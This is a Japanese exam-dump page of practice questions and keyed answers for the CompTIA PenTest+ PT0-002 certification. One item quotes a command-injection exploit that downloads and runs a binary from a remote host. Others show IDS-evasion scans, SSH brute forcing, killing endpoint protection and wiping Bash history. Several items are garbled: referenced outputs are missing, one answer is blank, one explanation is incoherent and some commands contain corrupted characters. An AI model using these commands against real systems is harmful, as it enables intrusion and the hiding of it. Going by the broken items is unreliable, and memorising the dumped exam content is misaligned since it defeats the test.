PT0-002更新された試験問題集で[2025年最新] 練習有効な試験問題集
PT0-002サンプルには正確で更新された問題
CompTIA PT0-002試験は、85の多肢選択問題とパフォーマンスベースの問題から成り、165分で受験を完了する必要があります。試験を受験したい候補者は、情報セキュリティにおける最低2年の経験と、複数のオペレーティングシステム、ネットワーキングプロトコル、プログラミング言語の知識を持つことが推奨されています。
Comptia Pentest+認定試験は、サイバー防衛、セキュリティ運用、脆弱性管理、ITおよびセキュリティコンサルティングで働く専門家を対象としています。この認定はベンダー中立です。つまり、特定のハードウェアまたはソフトウェアプラットフォームに結び付けられていません。したがって、個人は、認定プログラムで学んだことを使用して、メーカーやプラットフォームに関係なく、さまざまなシステムで浸透テストを実行できます。
質問 # 253
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:
Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)
- A. Telnet
- B. SMTP
- C. SNMP
- D. DNS
- E. NTP
- F. HTTP
正解:D、F
質問 # 254
During a penetration test of a server application, a security consultant found that the application randomly crashed or remained stable after opening several simultaneous connections to the application and always submitting the same packets of data. Which of the following is the best sequence of steps the tester should use to understand and exploit the vulnerability?
- A. Attacha local disassembler to the server application. Establish a single connection to the server application. Send fixed packets of data simultaneously using that connection.
- B. Attacha remoteprofiler to the server application. Establish a random number of connections to the server application. Send fixed packets of data simultaneously using those connections.
- C. Attacha remotedisassembler to the server application. Establish a small number of connections to the server application. Send fixed packets of data simultaneously using those connections.
- D. Attacha remotedebugger to the server application. Establish a large number of connections to the server application. Send fixed packets of data simultaneously using those connections.
正解:D
解説:
To understand and exploit the vulnerability causing the server application to crash or remain stable after opening several simultaneous connections, the best approach is to attach a remote debugger to the application.
This allows the penetration tester to monitor the application's behavior in real-time without affecting the stability of the testing environment. Establishing a large number of connections to the server and sending fixed packets of data simultaneously can help to reproduce the issue consistently, which is crucial for identifying the cause of the crashes. Analyzing the application's response and debugging data will provide insights into potential buffer overflow, race conditions, or other vulnerabilities.
References:
* Effective Debugging Techniques
* Fuzz Testing and Debugging
質問 # 255
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
- A. nmap -sA -sV --host-timeout 60 192.168.1.10
- B. nmap -p0 -T0 -sS 192.168.1.10
- C. nmap -f --badsum 192.168.1.10
- D. nmap -A -n 192.168.1.10
正解:B
質問 # 256
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
- A. A quick description of the vulnerability and a high-level control to fix it
- B. The rules of engagement from the assessment
- C. The executive summary and information regarding the testing company
- D. Information regarding the business impact if compromised
正解:A
解説:
Explanation
The systems administrator and the technical stuff would be more interested in the technical aspect of the findings
質問 # 257
Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?
- A. Hydra
- B. John the Ripper
- C. CeWL
- D. Hashcat
正解:A
解説:
Hydra is a powerful tool for conducting brute-force attacks against various protocols, including SSH. It is capable of using multiple threads to perform concurrent attempts, significantly increasing the efficiency of the attack. This capability makes Hydra particularly suited for brute-forcing user passwords over SSH, as it can quickly try numerous combinations of usernames and passwords. The tool's ability to support a wide range of protocols, its flexibility in handling different authentication mechanisms, and its efficiency in managing multiple simultaneous connections make it a go-to choice for penetration testers looking to test the strength of passwords in a target system's SSH service.
質問 # 258
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
- A. Traffic sniffing
- B. A ping sweep
- C. Port knocking
- D. Open-source research
- E. An Nmap scan
- F. A vulnerability scan
正解:A、D
解説:
Open-source research and traffic sniffing are two activities that have a minimal chance of detection, as they do not involve sending any packets or requests to the target network or system. Open-source research is the process of gathering information from publicly available sources, such as websites, social media, blogs, forums, etc. Traffic sniffing is the process of capturing and analyzing network packets that are transmitted over a shared medium, such as wireless or Ethernet.
Reference: https://www.sciencedirect.com/topics/computer-science/passive-reconnaissance
質問 # 259
A penetration tester wrote the following script on a compromised system:
#!/bin/bash
network='10.100.100'
ports='22 23 80 443'
for x in {1 .. 254};
do (nc -zv $network.$x $ports );
done
Which of the following would explain using this script instead of another tool?
- A. The typical tools could not be used against Windows systems.
- B. The penetration tester wanted to persist this script to run on reboot.
- C. The Bash script will provide more thorough output.
- D. The configuration required the penetration tester to not utilize additional files.
正解:D
質問 # 260
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?
- A. inurl:
- B. link:
- C. intitle:
- D. site:
正解:D
解説:
The site: command can be used to restrict searches on Google to a specific domain.
For example, site:company.com will return only results from the company.com domain.
This can help the penetration tester to find information or pages related to the target domain.
質問 # 261
Which of the following tools provides Python classes for interacting with network protocols?
- A. PowerSploit
- B. Responder
- C. Impacket
- D. Empire
正解:C
解説:
Impacket is a tool that provides Python classes for interacting with network protocols, such as SMB, DCE/RPC, LDAP, Kerberos, etc. Impacket can be used for network analysis, packet manipulation, authentication spoofing, credential dumping, lateral movement, and remote execution.
Reference: https://github.com/SecureAuthCorp/impacket
質問 # 262
After successfully compromising a remote host, a security consultant notices an endpoint protection software is running on the host. Which of the following commands would be best for the consultant to use to terminate the protection software and its child processes?
- A. taskkill /PID <PID> /IM /F
- B. taskkill /PID <PID> /F /P
- C. taskkill /PID <PID> /T /F
- D. taskkill /PID <PID> /S /U
正解:C
解説:
The taskkill command is used in Windows to terminate tasks by process ID (PID) or image name (IM). The correct command to terminate a specified process and any child processes which were started by it uses the /T flag, and the /F flag is used to force terminate the process. Therefore, taskkill /PID <PID> /T /F is the correct syntax to terminate the endpoint protection software and its child processes.
The other options listed are either incorrect syntax or do not accomplish the task of terminating the child processes:
*/IM specifies the image name but is not necessary when using /PID.
*/S specifies the remote system to connect to and /U specifies the user context under which the command should execute, neither of which are relevant to terminating processes.
*There is no /P flag in the taskkill command.
質問 # 263
Which of the following members of a client organization are most likely authorized to provide a signed authorization letter prior to the start date of a penetration test?
- A. The human resources team
- B. The executive management team and legal personnel
- C. Organizational security personnel
- D. The IT department
正解:B
質問 # 264
The following PowerShell snippet was extracted from a log of an attacker machine:
A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?
- A. Line 8
- B. Line 13
- C. Line 20
- D. Line 19
正解:A
解説:
$X=2,4,6,8,9,20,5
$y=[System.Collections.ArrayList]$X
$y.RemoveRange(1,2) As you can see the arrat has no brackets and no periods. IT HAS SEMICOLLINS TO SEPERATE THE LISTED ITEMS OR VALUES.
質問 # 265
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
- A. grep -v apache ~/.bash_history > ~/.bash_history
- B. taskkill /IM "apache" /F
- C. chmod 600 /tmp/apache
- D. rm -rf /tmp/apache
正解:D
解説:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.
質問 # 266
A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:
1;SELECT Username, Password FROM Users;
Which of the following injection attacks is the penetration tester using?
- A. Stacked queries
- B. Blind SQL
- C. Error-based
- D. Boolean SQL
正解:A
解説:
The penetration tester is using a type of injection attack called stacked queries, which means appending multiple SQL statements separated by semicolons in a single input field. This can allow the penetration tester to execute arbitrary SQL commands on the database server, such as selecting username and password from users table.
質問 # 267
During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?
- A. Using directional antennae
- B. Changing to Wi-Fi equipment that supports strong encryption
- C. Using WEP encryption
- D. Disabling Wi-Fi
正解:B
解説:
If a penetration tester was able to access the organization's wireless network from outside of the building using Aircrack-ng, then it means that the wireless network was not secured with strong encryption or authentication methods. Aircrack-ng is a tool that can crack weak wireless encryption schemes such as WEP or WPA-PSK using various techniques such as packet capture, injection, replay, and brute force. To remediate this issue, the client should change to Wi-Fi equipment that supports strong encryption such as WPA2 or WPA3, which are more resistant to cracking attacks. Using directional antennae may reduce the signal range of the wireless network, but it would not prevent an attacker who is within range from cracking the encryption.
Using WEP encryption is not a good recommendation, as WEP is known to be insecure and vulnerable to Aircrack-ng attacks. Disabling Wi-Fi may eliminate the risk of wireless attacks, but it would also eliminate the benefits of wireless connectivity for the organization.
質問 # 268
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
- A. Making a copy of the user's Bash history for further enumeration
- B. Redirecting Bash history to /dev/null
- C. Making decoy files on the system to confuse incident responders
- D. Covering tracks by clearing the Bash history
正解:D
解説:
The commands are used to clear the Bash history file of the current user, which records the commands entered in the terminal. The first command redirects /dev/null (a special file that discards any data written to it) to temp, which creates an empty file named temp. The second command changes the timestamp of temp to match that of .bash_history (the hidden file that stores the Bash history). The third command renames temp to
.bash_history, which overwrites the original file with an empty one. This effectively erases any trace of the commands executed by the user.
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover- your-tracks-remain-undetected-0244768/
質問 # 269
Which compilation method bundles all necessary libraries and dependencies into the payload, making it independent of the target system's library versions?
- A. Static compilation
- B. Shared objects
- C. Dynamic libraries
- D. Dynamic binary
正解:A
解説:
Static compilation ensures that all the necessary libraries and dependencies are bundled with the payload or exploit at the time of compilation. This eliminates reliance on the target system's library versions or availability, making it more likely that the payload will run regardless of the operating system version. This aligns with CompTIA Pentest+ objectives under exploit development and scripting to enhance exploit reliability.
質問 # 270
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:
U3VQZXIkM2NyZXQhCg==
Which of the following commands should the tester use NEXT to decode the contents of the file?
- A. tar zxvf password.txt
- B. john --wordlist /usr/share/seclists/rockyou.txt password.txt
- C. echo U3VQZXIkM2NyZXQhCg== | base64 €"d
- D. hydra €"l svsacct €"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24
正解:C
質問 # 271
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.
INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1





正解:
解説:
See all the solutions below in Explanation.
Explanation:


質問 # 272
......
合格させるCompTIA PT0-002プレミアムお試しセットテストエンジンPDFで無料問題集セット:https://jp.fast2test.com/PT0-002-premium-file.html
PT0-002試験情報と無料練習テスト:https://drive.google.com/open?id=14kCDLf2HnqUlEI-cUnzYi75jcGG7lxaK